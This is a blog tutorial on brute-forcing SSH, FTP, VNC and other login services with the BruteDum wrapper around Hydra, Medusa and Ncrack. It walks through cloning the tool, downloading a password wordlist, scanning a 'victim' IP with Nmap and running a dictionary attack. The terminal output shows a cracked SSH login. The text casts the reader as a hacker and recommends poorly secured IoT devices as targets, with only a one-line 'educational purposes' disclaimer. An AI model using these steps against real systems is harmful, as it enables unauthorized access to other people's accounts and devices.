How to Brute Force SSH, FTP, VNC and more with BruteDum

Disclaimer: I am not responsible for any damages that may be caused to you or others by the lessons learned here. It is strictly for educational purposes‼.

Brute force is an easy way to discover weak login credentials, and is often one of the first steps when a hacker encounters network services running on a network to which he has access. For both beginners and experienced hackers, it’s helpful to have access to the right tools to discover, classify, and then launch custom brute-force attacks against a target. BruteDum does it all from one frame.

Weak passwords are easy prey

When a hacker gains access to a system with services running on it, one of the first things they usually do is see if they can log in to any of those services with default or common credentials. Internet of Things (IoT) hardware and devices, like routers, are often left with default passwords enabled, making it easier for them to attack.

To test the services they discover for weak passwords, the hacker must select the right tool for the job, and it can be confusing to know which tool is best to use against a particular service.

BruteDum is a Python tool that allows a hacker to first acquire a target and run an in-frame scan to determine the best tool based on what is discovered. It’s easy to execute a brute force or dictionary attack against almost any standard protocol that is vulnerable to it.

The advantage of running BruteDum over specific tools is the ability to run a scan from the inside to identify what other processes can be run on the same device, as well as organize powerful tools to access user accounts in services like SSH.

Online or connected attacks

Unlike attacks launched against WPA networks where we can obtain a hash and try to decrypt it later, we need to bet connected to our target directly through the network to try a brute force or dictionary attack. While there are ways to hide our identity with a VPN or Tor, brute-force and dictionary attacks can be limited in effectiveness through a variety of different means.

One way to limit brute force and dictionary attacks is through speed limiting, in which a lock is triggered after a set number of unsuccessful login attempts. That, combined with signaling suspicious login attempts, can make brute force and dictionary attacks more likely to alert a target that they are under attack.

To execute an online dictionary attack, we will use THC Hydra, Medusa, or Ncrack against the services we discover, using BruteDum to scan and organize our attacks between these tools. We will also need a list of passwords, which will be critical to the success or failure of our dictionary attack. If the list of passwords is too large, it will take a long time to attack the network, and if it is not reasonably enough to contain the password, we run the risk that it is not on the list, causing the attack to fail.

What you will need

To follow this guide, you will need Python3 installed on your system. Also, I recommend using Kali Linux as it should have most of the necessary programs installed by default. If you are doing this on another system, you will need to make sure you have all the prerequisite programs installed.

If you are not using Kali Linux, you can use Ubuntu or Debian, but you will need to make sure you have Hydra, Medusa and Ncrack installed. You will also need Nmap to scan.

We will also need a list of passwords to test and, in this case, we will download it to a folder that we create later. If you have a list of favorite passwords, you will need to copy it to the folder we will create.

Step 1: Download and configure BruteDum

To get started, we will need to download the GitHub repository. In a new terminal window, you can type the following command to clone the repository.

~$ git clone https://github.com/GitHackTools/BruteDum Cloning into 'BruteDum'... remote: Enumerating objects: 15, done. remote: Counting objects: 100% (15/15), done. remote: Compressing objects: 100% (14/14), done. remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (15/15), done.

And this to navigate in the directory:

~$ cd BruteDum

From inside this folder, you will be able to run BruteDum. Before doing so, we must deal with a small peculiarity. I found out that BruteDum was unable to find password lists saved outside of the BruteDum folder, so the solution seems to be to add our password list directly there. To do this, I will simply remove one from GitHub and download it to the folder where I am using the wget command.

~/BruteDum$ wget https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt --2020-01-10 17:19:59-- https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 1620 (1.6K) [text/plain] Saving to: ‘Top207-probable-v2.txt’ Top207-probable-v2. 100%[===================>] 1.58K --.-KB/s in 0s 2020-01-10 17:19:59 (53.3 MB/s) - ‘Top207-probable-v2.txt’ saved [1620/1620]

Once this is done, we can run BruteDum by typing the following command.

~/BruteDum$ python3 brutedum.py 888888 888888 BRUTE 8 8 eeeee e e eeeee eeee 8 8 e e eeeeeee FORCE 8eeee8ee 8 8 8 8 8 8 8e 8 8 8 8 8 8 JUST 88 8 8eee8e 8e 8 8e 8eee 88 8 8e 8 8e 8 8 FOR 88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 THE 88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES [i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack Author: https://GitHackTools.blogspot.com [?] Enter the victim address:

Step 2: Enter destination address

Once the loading screen finishes, we will need to enter the victim’s IP address. Once you have done that, press Enter and you will be presented with the option to run an Nmap scan. It is a useful feature that can help you discover other open services on the same device.

 Type Y and hit Enter to run the Nmap scan.
[?] Enter the victim address: 192.168.43.1 [?] Do you want to scan victim's ports with Nmap? [Y/n]: Y

When the results return, you should be able to identify any port that returns as “open”. Next, you’ll need to select a service to decrypt. The menu for doing this is fairly easy to understand, and you can choose one that matches the service that our Nmap scan discovered.

[+] Scanning ports with Nmap... Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-10 02:57 PDT Nmap scan report for 192.168.43.1 Host is up (0.0087s latency). Not shown: 997 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: ███.███.███.███.███.███ Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds [1] FTP [2] Telnet (Default port is 21) (Default port is 23) [3] PostgreSQL [4] SSH (Default port is 5432) (Default port is 22) [5] RDP [6] VNC (Default port is 3389) (Default port is 5900) [?] Which protocol do you want to crack? [1-6]: 4
In our example, we'll select option 4 and hit Enter to indicate we want to do SSH cracking.

Step 3: Select the tool

Now, we will need to determine the tool that we will use to try to crack the password. Depending on which service we select, BruteDum will recommend one to use.

888888 888888 BRUTE 8 8 eeeee e e eeeee eeee 8 8 e e eeeeeee FORCE 8eeee8ee 8 8 8 8 8 8 8e 8 8 8 8 8 8 JUST 88 8 8eee8e 8e 8 8e 8eee 88 8 8e 8 8e 8 8 FOR 88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 THE 88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES [i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack Author: https://GitHackTools.blogspot.com [i] Target: 192.168.43.1 Protocol: ssh [1] Ncrack [2] Hydra (Recommended) [3] Medusa [?] Which tool do you want to use? [1-3]: 2

We will select Hydra, since it is the recommended one to decrypt SSH. Type 2 to indicate Hydra (or the number of the tool you want to use) and press Enter to start configuring it.

Step 4: Set username and password lists

To launch our attack, we will need to make a time versus probability offset. Our first option will be to select a list of user names. That means we will try every password in our password list with every username in our username list. It can turn into many attempts very quickly.
In our example, we can select N to reject using a list of user names. Instead, we will use a common username, or one that we might know exists by default in the device type.

[i] Target: 192.168.43.1 Protocol: ssh [?] Do you want to use username list? [Y/n]: N

Because we declined to supply a username list, we’ll have to enter one manually instead. Here, I’ll enter toor, as I know that’s the username for our test device.

[?] Enter the username: toor

Next, we will have to configure the list of passwords. It will not work if we select a list of passwords outside the directory we are in, so now we can add the list of passwords that we downloaded previously. If you followed up before, we should be able to paste the Top207-probable-v2.txt wordlist here.

[?] Enter the path of wordlist: Top207-probable-v2.txt

Step 5: Launch the attack

Finally, we can decide if we want to use the default port or not. Some devices can host services on a non-standard port, but this is not very common. For SSH, the default port is 22, so we’ll just type Y and hit Enter.

[?] Do you want to use default port? [Y/n]: Y

If you are attacking a service on a non-standard port, you can specify it here and press Enter. Do not accidentally write the port number you want to attack here, as the script will crash.
As soon as you supply the port, BruteDum will launch the tool you specified.

[i] Target: 192.168.43.1 Protocol: ssh [+] Hydra is cracking... Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-10 09:23:30 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 208 login tries (l:1/p:208), ~13 tries per task [DATA] attacking ssh://192.168.43.1:22/

After a while to attack the network and test all the passwords, you will get a result, either revealing the password or reporting that a valid password was not found.

[22][ssh] host: 192.168.43.1 login: toor password: root 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 3 final worker threads did not complete until end. [ERROR] 3 targets did not resolve or could not be connected [ERROR] 16 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-10 10:51:18 [?] Do you want to conitnue? [Y/n]: N

Brute force attacks find weak passwords

A key thing to remember about brute force and dictionary attacks is that they are powerful in the right place, but not a silver bullet to get into accounts. Weak passwords are especially easy to find with BruteDum, but more complicated passwords require longer password lists. That problem requires prolonged contact with the victim to burn off those longer lists, making the attack less practical and more obvious to anyone who is on the lookout for this type of attack.
An ideal target for these attacks is primarily IoT devices, which generally have poor security and a large number of services that run under default credentials.

Also Read: What is Juice Jacking and How to prevent in India 2020

Leave a Comment